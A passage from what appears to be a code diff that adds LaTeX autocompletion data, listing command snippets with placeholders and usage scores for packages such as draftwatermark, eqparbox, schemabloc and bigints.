'draftwatermark-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'draftwatermark-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'draftwatermark-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'draftwatermark-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'draftwatermark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'draftwatermark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'draftwatermark-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'draftwatermark-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'draftwatermark-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'draftwatermark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'draftwatermark-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'draftwatermark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'draftwatermark-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'draftwatermark-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'draftwatermark-cmd', + score: 0.004719094298848707, + }, + ], + eqparbox: [ + { + caption: '\\eqparbox{}{}', + snippet: '\\eqparbox{$1}{$2}', + meta: 'eqparbox-cmd', + score: 2.9423534119530166e-5, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'eqparbox-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'eqparbox-cmd', + score: 3.800886892251021, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'eqparbox-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'eqparbox-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'eqparbox-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'eqparbox-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'eqparbox-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eqparbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'eqparbox-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'eqparbox-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'eqparbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'eqparbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'eqparbox-cmd', + score: 0.021170869458413965, + }, + ], + nowidow: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nowidow-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'nowidow-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nowidow-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nowidow-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'nowidow-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nowidow-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nowidow-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'nowidow-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'nowidow-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'nowidow-cmd', + score: 0.021170869458413965, + }, + ], + stackrel: [ + { + caption: '\\stackrel{}{}', + snippet: '\\stackrel{$1}{$2}', + meta: 'stackrel-cmd', + score: 0.009911875742973681, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'stackrel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'stackrel-cmd', + score: 0.002958865219480927, + }, + ], + threeparttablex: [ + { + caption: '\\item', + snippet: '\\item ', + meta: 'threeparttablex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'threeparttablex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\insertTableNotes', + snippet: '\\insertTableNotes', + meta: 'threeparttablex-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\tnotex{}', + snippet: '\\tnotex{$1}', + meta: 'threeparttablex-cmd', + score: 0.0021491972748178554, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'threeparttablex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'threeparttablex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'threeparttablex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'threeparttablex-cmd', + score: 3.800886892251021, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'threeparttablex-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'threeparttablex-cmd', + score: 0.021170869458413965, + }, + ], + mathdesign: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'mathdesign-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mathdesign-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mathdesign-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'mathdesign-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'mathdesign-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'mathdesign-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'mathdesign-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'mathdesign-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'mathdesign-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'mathdesign-cmd', + score: 0.00037306820619479756, + }, + ], + 'pst-node': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-node-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-node-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-node-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-node-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-node-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-node-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-node-cmd', + score: 0.006520475264573554, + }, + ], + varwidth: [ + { + caption: '\\par', + snippet: '\\par', + meta: 'varwidth-cmd', + score: 0.413853376001159, + }, + ], + schemabloc: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'schemabloc-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'schemabloc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'schemabloc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'schemabloc-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'schemabloc-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'schemabloc-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'schemabloc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'schemabloc-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'schemabloc-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'schemabloc-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'schemabloc-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'schemabloc-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'schemabloc-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'schemabloc-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'schemabloc-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'schemabloc-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'schemabloc-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'schemabloc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'schemabloc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'schemabloc-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'schemabloc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'schemabloc-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'schemabloc-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'schemabloc-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'schemabloc-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'schemabloc-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'schemabloc-cmd', + score: 0.2864294797053033, + }, + ], + bigints: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'bigints-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'bigints-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'bigints-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'bigints-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'bigints-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'bigints-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'bigints-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'bigints-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'bigints-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'bigints-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'bigints-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'bigints-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'bigints-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'bigints-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'bigints-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'bigints-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'bigints-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'bigints-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'bigints-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'bigints-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'bigints-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'bigints-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'bigints-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'bigints-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'bigints-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'bigints-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'bigints-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'bigints-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'bigints-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'bigints-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'bigints-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'bigints-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'bigints-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'bigints-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'bigints-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'bigints-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'bigints-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'bigints-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'bigints-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'bigints-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'bigints-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'bigints-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'bigints-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'bigints-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'bigints-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'bigints-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'bigints-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'bigints-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'bigints-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'bigints-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'bigints-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'bigints-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'bigints-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'bigints-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'bigints-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'bigints-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'bigints-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'bigints-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'bigints-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'bigints-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'bigints-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'bigints-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'bigints-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'bigints-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'bigints-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'bigints-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'bigints-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'bigints-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'bigints-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'bigints-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'bigints-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'bigints-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'bigints-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'bigints-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'bigints-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'bigints-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'bigints-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'bigints-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'bigints-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'bigints-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'bigints-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'bigints-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'bigints-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'bigints-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'bigints-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'bigints-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'bigints-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'bigints-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'bigints-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'bigints-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'bigints-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'bigints-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'bigints-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'bigints-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'bigints-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'bigints-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'bigints-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'bigints-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'bigints-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'bigints-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'bigints-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'bigints-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'bigints-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: 